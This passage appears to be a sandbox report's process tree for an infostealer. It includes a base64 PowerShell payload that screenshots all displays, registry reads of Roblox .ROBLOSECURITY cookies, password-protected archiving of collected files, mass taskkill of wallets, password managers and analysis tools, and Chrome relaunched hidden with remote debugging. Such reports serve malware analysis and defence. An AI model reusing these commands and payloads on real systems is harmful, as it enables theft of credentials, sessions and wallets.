AHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                            5⤵
                                                                              PID:3496
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                6⤵
                                                                                  PID:1192
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k4k342c1\k4k342c1.cmdline"
                                                                                    7⤵
                                                                                      PID:5196
                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6102.tmp" "c:\Users\Admin\appdata\Local\Temp\k4k342c1\CSC939CD9FEBE3C46D9987C24652FB8B555.TMP"
                                                                                        8⤵
                                                                                          PID:2884
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"
                                                                                    5⤵
                                                                                      PID:5704
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon
                                                                                        6⤵
                                                                                          PID:1624
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                        5⤵
                                                                                          PID:3212
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            6⤵
                                                                                              PID:4360
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                            5⤵
                                                                                              PID:4672
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                6⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Views/modifies file attributes
                                                                                                PID:836
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                              5⤵
                                                                                                PID:3432
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                  6⤵
                                                                                                  • Drops file in Drivers directory
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:1952
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                5⤵
                                                                                                  PID:1908
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    6⤵
                                                                                                      PID:5612
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5612 -s 144
                                                                                                        7⤵
                                                                                                          PID:5728
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                      5⤵
                                                                                                        PID:2828
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          tasklist /FO LIST
                                                                                                          6⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          PID:2668
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                        5⤵
                                                                                                          PID:5860
                                                                                                          • C:\Windows\system32\tree.com
                                                                                                            tree /A /F
                                                                                                            6⤵
                                                                                                              PID:3360
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                            5⤵
                                                                                                              PID:2448
                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                tree /A /F
                                                                                                                6⤵
                                                                                                                  PID:5200
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                5⤵
                                                                                                                  PID:3348
                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                    tree /A /F
                                                                                                                    6⤵
                                                                                                                      PID:2564
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                    5⤵
                                                                                                                      PID:4272
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                        6⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:3288
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                      5⤵
                                                                                                                        PID:1004
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                          6⤵
                                                                                                                            PID:4440
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\t0TYM.zip" *"
                                                                                                                          5⤵
                                                                                                                            PID:456
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\t0TYM.zip" *
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4316
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                            5⤵
                                                                                                                              PID:2076
                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                wmic os get Caption
                                                                                                                                6⤵
                                                                                                                                  PID:5016
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                5⤵
                                                                                                                                  PID:3528
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic computersystem get totalphysicalmemory
                                                                                                                                    6⤵
                                                                                                                                      PID:2796
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                    5⤵
                                                                                                                                      PID:3364
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        wmic csproduct get uuid
                                                                                                                                        6⤵
                                                                                                                                          PID:2004
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:3952
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4360
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\bot2.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:3976
                                                                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                        taskkill /F /IM ArmoryQt.exe
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5124
                                                                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                        taskkill /F /IM "Atomic Wallet.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1116
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          6⤵
                                                                                                                                            PID:1004
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM bytecoin-gui.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4600
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Coinomi.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4956
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Element.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2908
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Exodus.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5672
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Guarda.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2416
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM KeePassXC.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5028
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM NordVPN.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3420
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM OpenVPNConnect.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3452
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM seamonkey.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5908
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Signal.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4420
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM filezilla.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:1012
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM filezilla-server-gui.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5812
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM keepassxc-proxy.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2020
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM nordvpn-service.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4596
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM steam.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:1164
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM walletd.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2828
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM waterfox.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5412
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Discord.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3820
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM DiscordCanary.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:1000
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM burp.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3628
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM Ethereal.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4044
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM EtherApe.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4580
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM fiddler.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5240
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM HTTPDebuggerSvc.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:1740
                                                                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                          taskkill /F /IM HTTPDebuggerUI.exe
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3652
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            6⤵
                                                                                                                                              PID:4316
                                                                                                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                            taskkill /F /IM snpa.exe
                                                                                                                                            5⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:4332
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              6⤵
                                                                                                                                                PID:5016
                                                                                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                              taskkill /F /IM solarwinds.exe
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:3080
                                                                                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                              taskkill /F /IM tcpdump.exe
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:3292
                                                                                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                              taskkill /F /IM telerik.exe
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5828
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                6⤵
                                                                                                                                                  PID:456
                                                                                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                taskkill /F /IM wireshark.exe
                                                                                                                                                5⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:4488
                                                                                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                taskkill /F /IM winpcap.exe
                                                                                                                                                5⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:4632
                                                                                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                taskkill /F /IM telegram.exe
                                                                                                                                                5⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:884
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2004
                                                                                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                  taskkill /F /IM chrome.exe
                                                                                                                                                  5⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:760
                                                                                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                  taskkill /F /IM chrome.exe
                                                                                                                                                  5⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:3508
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                  5⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3680
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7fff2430cc40,0x7fff2430cc4c,0x7fff2430cc58
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5256
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1952,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:2
                                                                                                                                                      6⤵
                                                                                                                                                        PID:1312
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1956,i,3880340073250726528,15326183536585769892,262144 --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:3
                                                                                                                                                        6⤵
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        PID:5348
